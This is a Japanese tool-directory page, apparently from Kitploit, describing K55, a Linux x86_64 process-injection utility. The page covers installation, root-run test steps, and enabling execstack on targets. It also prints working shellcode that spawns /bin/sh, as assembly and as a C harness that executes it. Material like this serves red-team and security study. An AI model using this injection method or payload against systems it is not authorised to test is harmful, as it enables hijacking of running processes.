Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
K55 — Linux x86_64 プロセスインジェクションユーティリティ | Kitploit
ツール/GitHubGitHub/josh0xa/k55
エクスプロイトシェルコードレッドチーミング
GitHubjosh0xa/k55

K55

Linux x86_64 プロセスインジェクションユーティリティ

リポジトリを見る
59135年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

K55 - Linux x86_64 プロセスインジェクションユーティリティ (C++14)

lisence

K55 について

(発音: "kay fifty-five")
K55 ペイロードインジェクションツールは、x86_64 シェルコードペイロードを実行中のプロセスに注入するために使用されます。このユーティリティは、最新の C++11 技術と、ptrace() のような伝統的な C 言語の Linux 関数を組み合わせて開発されました。対象プロセスで生成されるシェルコードは 27 バイトで、対象のアドレス空間内で /bin/sh (bash シェルを起動) を実行します。将来的には、ユーザーがコマンドライン引数で独自のシェルコードを入力できるようにする予定です。

インストール方法

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

K55 の使い方

Usage: ./K55 <process-name>

  • process-name は、r-xp または execstack 権限を持つ任意の Linux プロセスである必要があります。

テスト

テスト 1) 1 つのターミナル (K55/ ディレクトリ) で以下を実行: ./k55_example_process/k55_test_process
テスト 2) 別のターミナルでインジェクターを実行: sudo ./K55 k55_test_process

K55 の動作

  • K55 シェルコードインジェクターを (root として) 実行すると、k55_test_process 内でシェルが生成されます。

指定したプロセスへの注入

ターゲットで生成されたシェル

制限事項

当然ながら、ptrace(PTRACE_POKETEXT...) 呼び出しは最も目立たない方法ではありません。そのため、一部のアプリケーションでは K55 の効果が制限される可能性があります。ただし、セキュリティテストの際は、対象のアプリケーションに対して execstack を有効にしてください。たとえば、gdb でテストする場合、注入前に以下を実行します: sudo execstack -s /usr/bin/gdb。execstack はディストリビューションのパッケージマネージャからインストールしてください。Arch Linux ユーザーの場合、execstack は AUR から入手できます。

シェルペイロードの作成

注: 以下はデモンストレーションです。ペイロード文字列は既に K55 にハードコードされています。

ペイロードのアセンブリ実装 (shell-storm より引用 (リダイレクト))

root@kitploit:~
main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall

ペイロードの C 実装

root@kitploit:~
#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

参考文献

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

ライセンス

MIT ライセンス
Copyright (c) Josh Schiavone

ツールをダウンロード